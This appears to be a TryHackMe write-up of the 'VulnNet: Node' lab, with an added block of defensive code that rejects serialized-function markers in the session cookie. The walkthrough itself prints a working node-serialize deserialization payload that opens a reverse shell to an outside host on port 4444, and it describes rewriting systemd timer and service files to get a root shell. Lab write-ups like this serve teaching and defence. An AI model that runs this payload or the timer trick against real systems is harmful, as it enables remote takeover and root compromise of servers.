VulnNet: Node TryHackMe WalkThrough

VulnNet Entertainment has moved its infrastructure and now they’re confident that no breach will happen again. You’re tasked to prove otherwise and penetrate their network.

  • Difficulty: Easy
  • Web Language: JavaScript

Enumeration

Only port 8080 is open.

More Enumeration…

Manual Enumeration

  • No sensitive data on the source code.

Let’s open burp and catch the data.

Looking at the cookie, I can see that the session value is base64 encoded and then URL encoded.

eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ%3D%3D

{"username":"Guest","isGuest":true,"encoding": "utf-8"}

So, the only way into the machine is through some RCE, since simply tampering with the cookie values may not give anything.

Let’s Learn & Hack

Use the same cookie and request the home page /
  • Point to note: the response shows an unserialize error, so the cookie is passed to a deserializer.

Let’s use the payload: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#nodejs

Used payload: {"username":"_$$ND_FUNC$$_function (){(function(){var net = require('net'),cp = require('child_process'),sh = cp.spawn('/bin/sh', []);var client = new net.Socket();client.connect(4444, '10.14.12.48', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});})();}()"}
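For the defensive side of this bug, here is an added example (not part of the original walkthrough) that decodes the session cookie the same way the application does, but with plain JSON.parse and a check for the "_$$ND_FUNC$$_" marker that node-serialize uses to mark a serialized function; the assumption is that the application deserializes this cookie with node-serialize, and the tampered sample cookie is constructed here.

```javascript
// Added example: decode a VulnNet: Node style session cookie safely and flag
// serialized-function markers before the value ever reaches unserialize().
// Assumption: the app uses node-serialize, whose function marker is the
// "_$$ND_FUNC$$_" prefix; anything starting with it would be eval'd on load.
const FUNC_MARKER = '_$$ND_FUNC$$_';

// Decode: URL-decode first (the %3D%3D padding), then base64, then JSON.
// JSON.parse never evaluates code, unlike unserialize().
function decodeSessionCookie(cookie) {
  const b64 = decodeURIComponent(cookie);
  const json = Buffer.from(b64, 'base64').toString('utf8');
  return JSON.parse(json);
}

// Walk the decoded object and return the path of every string value that
// carries the serialized-function marker (nested objects included).
function findFunctionMarkers(obj, path = '$') {
  const hits = [];
  if (typeof obj === 'string') {
    if (obj.startsWith(FUNC_MARKER)) hits.push(path);
  } else if (obj && typeof obj === 'object') {
    for (const [k, v] of Object.entries(obj)) {
      hits.push(...findFunctionMarkers(v, `${path}.${k}`));
    }
  }
  return hits;
}

// Reject malformed cookies and any cookie carrying a marker, returning a
// reason suitable for a log line; only clean sessions are returned.
function parseSessionSafely(cookie) {
  let session;
  try {
    session = decodeSessionCookie(cookie);
  } catch (e) {
    return { ok: false, reason: 'malformed cookie' };
  }
  const markers = findFunctionMarkers(session);
  if (markers.length > 0) {
    return { ok: false, reason: `serialized function in ${markers.join(', ')}` };
  }
  return { ok: true, session };
}

// Constructed samples: the Guest cookie seen in Burp, and a tampered one whose
// username field carries the marker (the function body here is empty).
const GUEST_COOKIE = 'eyJ1c2VybmFtZSI6Ikd1ZXN0IiwiaXNHdWVzdCI6dHJ1ZSwiZW5jb2RpbmciOiAidXRmLTgifQ%3D%3D';
const TAMPERED_COOKIE = encodeURIComponent(
  Buffer.from(JSON.stringify({ username: '_$$ND_FUNC$$_function(){}()' })).toString('base64'));
```

Running parseSessionSafely on each sample returns the Guest session for the first and a rejection naming $.username for the second.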

Got the reverse shell as www; next comes lateral movement to a user account.

Privilege Escalation

Change the .timer and .service files so that the service runs the reverse shell.

The timer fires and we get a root shell within a second.
